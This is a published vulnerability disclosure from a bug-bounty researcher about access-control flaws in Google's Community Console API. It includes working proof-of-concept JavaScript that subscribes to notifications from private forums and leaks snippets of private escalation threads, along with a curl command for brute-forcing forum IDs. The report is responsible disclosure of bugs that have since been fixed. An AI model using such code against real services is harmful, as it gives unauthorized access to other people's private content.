Page MenuHomeVulnz
Create Task
Maniphest T25

Subscriptions to saved filters trigger email notifications for unauthorized threads
VerifiedPublic
Actions

Description

WARNING: this report SHOULDN'T be published until the vulnerability in T25#429 has been fixed.

This is a bug I reported to Google via Google's Vulnerability Rewards Program on Jan 2, 2021.

Below is an intact reproduction of the report sent to Google (I censored some parts):

Reproduction steps

  1. Open Chrome and sign in at Google with any regular Google Account (it can be a new one).
  2. Go to https://support.google.com/chrome/thread/83519363?hl=en and press the "upvote˝ button so a forum profile is automatically created and associated to the Google Account. (not necessary if the profile already exists)
  3. Go to https://support.google.com/ and open the Javascript Console (Ctrl+Shift+J/Cmd+Alt+J).
  4. Run the following Javascript code in the Javascript Console:
exploit.js
// This script does the following things so the user can receive email
// notifications for new posts in a specific forum:
//   1. It saves a custom filter which matches threads from the target forum.
//   2. It subscribes to the filter so the user receives notifications for new
//      threads which match the filter.

// In this example the target forum is the [REDACTED] Private Forum:
var targetForum = '[REDACTED]';
// This is a unique name for the new filter:
var filterName = 'filtertest';

// HTTP request to create a saved filter for threads of the target Forum in
// English
fetch('https://support.google.com/s/community/api/CreateSavedSearch', {
  'headers': {
    'content-type': 'text/plain; charset=utf-8',
  },
  'body': JSON.stringify({
    2: {
      1: filterName,
      2: 'forum:' + targetForum + ' lang:en',
    },
  }),
  'method': 'POST',
  'mode': 'cors',
  'credentials': 'include'
}).then(_ => {
  // HTTP request to subscribe to the saved filter
  fetch('https://support.google.com/s/community/api/SubscribeToSavedSearch', {
    'headers': {
      'content-type': 'text/plain; charset=utf-8',
    },
    'body': JSON.stringify({
      1: filterName,
      3: [targetForum],
    }),
    'method': 'POST',
    'mode': 'cors',
    'credentials': 'include'
  });
});
  1. Now, with a Google Account which has access to the private forum specified in the script (in the example the English Chrome Gold+ Private Forum), create a thread there by visiting https://support.google.com/s/community/new (select the forum and language according to the filter).
  2. Wait some time (up to 2 hours).
  3. The user who ran the script will receive an email notification about the new thread, even if that user doesn't have access to that private forum/thread.

Browser/OS: N/A

The issue is that the code which triggers notifications doesn't take into account the user's context: the fact that users don't necessarily have access to all the threads.

Attack scenario

This vulnerability can be exploited by any user as mentioned in the reproduction steps, although in order to come up with those steps the user needs to understand at least partially how the Community Console API works.

The Community Console is only accessible by Googlers and Product Experts (https://productexperts.withgoogle.com/what-is-it), so only those (and ex-Product Experts) would be able to learn directly how the Community Console API works (without taking into account that other users could learn this indirectly).

The attack scenario is the following:

  1. Find a forum ID for a private forum. This can be done in several ways:
    • Brute force forum IDs: call the https://support.google.com/s/community/api/GetForum API endpoint with different forum IDs starting from 0 in ascending order, and when the endpoint returns an "Unauthorized" response, that means that's a forum we can target. This is feasible to do. Example of a call to the GetForum endpoint: curl 'https://support.google.com/s/community/api/GetForum' -H 'content-type: text/plain; charset=utf-8' --data '{"1":"1479660"}'
    • Find the forum IDs in URLs shared "publicly˝. The person sharing the link might think that sharing the URL with some people who maybe don't have access to that thread is not bad because the access will just be denied (so they trust the server to provide proper access control). This is rarely the case, but can happen.
  2. Follow the reproduction steps attached in this report with the ID of the private forum, in order to create the saved filter and subscribe to it.

By doing this, the attacker can gain access to the content of the first message for each thread created after subscribing to the filter in that forum. [REDACTED]

Details

Vendor
Google
Product
Community Console
Reported
Jan 2 2021, 1:41 PM
Reward
3133

Related Objects
Search...

Event Timeline

avm99963 triaged this task as Priority-1 priority.Jan 2 2021, 2:09 PM
avm99963 created this task.
avm99963 added a comment.EditedJan 8 2021, 8:40 PM

Another vulnerability similar to this one has been reported to Google on Jan 8, 2021 as a comment in the same bug opened by this vulnerability report, due to the similarities between both vulnerabilities.

This is an intact reproduction of the report sent to Google (I censored some parts):

I just found another vulnerability similar to the one reported here (the result is unauthorized access to partial information of some private threads). Because of the similarity, I'll report it here as a comment, but let me know if this should be treated in a separate bug.

Also, as a side note: this vulnerability can be leveraged to exploit the original saved filters vulnerability easier.

Abstract

Any signed-in Google user can obtain partial information about an escalation to a private forum via the GetThreadActivity API method.

Reproduction steps

  1. Prepare the environment:
    1. Open Chrome and sign in at Google with any regular Google Account (it can be a new one).
    2. Go to https://support.google.com/chrome/thread/83519363?hl=en and press the "upvote" button so a forum profile is automatically created and associated to the Google Account. (not necessary if the profile already exists)
  2. Go to https://support.google.com/ and open the Javascript Console (Ctrl+Shift+J/Cmd+Alt+J).
  3. Now, in the Javascript Console, run the following Javascript script, which will call the GetThreadActivity method for a thread which we know has been escalated to a private forum:
exploit2.js
fetch('https://support.google.com/s/community/api/GetThreadActivity', {
  'headers': {
    'content-type': 'text/plain; charset=utf-8',
  },
  'body': JSON.stringify({
    1: '[REDACTED]', // Forum ID
    2: '[REDACTED]', // Thread ID
    3: 'es', // Language
  }),
  'method': 'POST',
  'mode': 'cors',
  'credentials': 'include',
})).then(res => res.json()).then(res => console.log(res));
  1. An object with the response will be printed in the Console when the request finishes. Expand it, and you'll see several entries. One of them, which looks like this (I commented the most relevant parts), corresponds to the escalation:
{
  "1": "[REDACTED]",
  "2": "[REDACTED]",
  "3": "[REDACTED]",
  "4": 3,
  "5": { ... }, // Omitted: this is info about the user who escalated the thread
  "6": "[REDACTED]", // Private forum name
  "7": {
    "2": {
      "1": {
        "1": "[REDACTED]", // Thread ID of the escalation in the private forum
        "2": "[REDACTED]",
        "3": "[REDACTED]", // Private forum ID
        "4": "[REDACTED]"
      },
      "7": "[REDACTED]",
      "9": "Al entrar a Chome la pantalla se palidece y de torna amarilla. ", // Escalation title
      "10": "[REDACTED]",
      "12": {},
      // Snippet of the escalation body:
      "13": "¡Hola!\n[REDACTED]",
      "14": "es",
      "15": 20,
      "17": "[REDACTED]",
      "21": 7,
      "24": 0,
      "32": 1,
      "36": true,
      "39": "[REDACTED]"
    },
    "4": { ... } // Omitted: more info about the user who escalated the thread
  }
}

Attack scenario

The set of people who can become aware and exploit the vulnerability is the same as the one described in the original report.

The attack would be the following:

  1. Search the keyword "escalate" in the Google Communities/forums. For example, visit https://support.google.com/s/community/search/query%3Dforum%253Aany%2Blang%253Aen%2Bescalate or manually perform the API call which the frontend code does to get the list of threads when opening that page.
  2. For each thread in the list, run the reproduction steps, setting the appropriate thread/forum/language in the Javascript code.

This will obtain the title and a snippet of the escalation thread (which should not be visible by the user as the escalation thread is private), and the private forum and escalation thread IDs.

Apart from the fact that this would grant limited access to the private thread contents, the private forum ID returned can be used to exploit the original saved filters report.

avm99963 updated the task description. (Show Details)Jan 8 2021, 8:41 PM
avm99963 changed the task status from New to Accepted.Feb 9 2021, 5:58 PM

Google mentioned on Jan 7 that a bug report was filed based on my report, so I'm marking this issue as accepted.

avm99963 set Reward to 3133.Feb 9 2021, 6:01 PM
avm99963 mentioned this in T26: Missing access control in methods v2/users:search and v2/users/status:batchUpdate.Jun 15 2021, 4:11 AM
avm99963 added a parent task: T26: Missing access control in methods v2/users:search and v2/users/status:batchUpdate.Jun 15 2021, 4:13 AM
avm99963 added a comment.Jun 15 2021, 12:05 PM

I just confirmed that the main vulnerability is fixed, while the one in comment T25#429 isn't.

avm99963 added a comment.Oct 24 2021, 6:48 PM

I just checked T25#429 hasn't been fixed yet, so I just sent a message in the Buganizer bug to state that.

avm99963 updated the task description. (Show Details)Oct 24 2021, 6:48 PM
avm99963 closed this task as Verified.Oct 1 2022, 7:03 PM

T25#429 is now fixed (Google notified me on Feb 19, 2022, and I could verify it now). Thus, publishing the whole report.

avm99963 changed the visibility from "Restricted Project (Project)" to "Public (No Login Required)".Oct 1 2022, 7:03 PM